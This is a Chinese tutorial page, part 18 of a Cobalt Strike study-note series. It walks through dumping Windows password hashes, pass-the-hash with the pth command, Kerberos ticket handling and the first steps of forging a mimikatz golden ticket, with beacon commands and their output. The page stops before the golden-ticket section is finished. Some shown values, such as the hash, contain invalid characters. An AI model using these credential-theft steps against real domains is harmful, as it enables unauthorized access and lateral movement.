1. 极安网首页
  2. 网络安全教程

CobaltStrike视频学习笔记系列:(十八)密码哈希散列设置信任

CobaltStrike视频学习笔记系列:(十八)密码哈希散列设置信任-极安网

0x00 前言

继续上一节密码哈希的部分,在上一节中讲到了使用密码生成用户的令牌,从而取得系统的信任,这一节将介绍使用密码的哈希值来取得系统的信任。

0x01 密码哈希

首先使用 hashdump 获取用户的密码哈希值,这里的 beacon 会话为 SYSTEM 权限。

  1. secvery> hashdump
  2. [*] Tasked beacon to dump hashes
  3. [+] host called home, sent: 82501 bytes

使用 pth 获取信任

  1. secvery> pth TEAMSSIX\Administrator 12cb161bvca930994x00cbc0aczf06d1

0x02 Kerberos 票据

查看有哪些 Kerberos 票据

  1. shell klist

除去 kerberos 票据

  1. kerberos_ticket_purge

加载 kerberos 票据

  1. kerberos_ticket_use [/path/to/file.ticket]

0x03 黄金票据

黄金票据 Golden Ticket 是 KRBTGT 帐户的 Kerberos 身份验证令牌,KRBTGT 帐户是一个特殊的隐藏帐户,用于加密 DC 的所有身份验证令牌。然后黄金票据可以使用哈希传递技术登录到任何帐户,从而使攻击者可以在网络内部不受注意地移动。

使用 mimikatz 伪造黄金票据需要:

1、目标的用户名及域名

2、域的 SID 值

域的 SID 值即安全标识符 Security Identifiers,使用 whoami /user 命令可查看,注意不需要 SID 最后的一组数字。

  1. secvery> shell whoami /user
  2. [*] Tasked beacon to run: whoami /user
  3. [+] host called home, sent: 43 bytes

因为不需要 SID 最后一组数字,所以这里要使用的 SID 也就是 S-1-5-21-5311978431-183514165-284342044

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/1984.html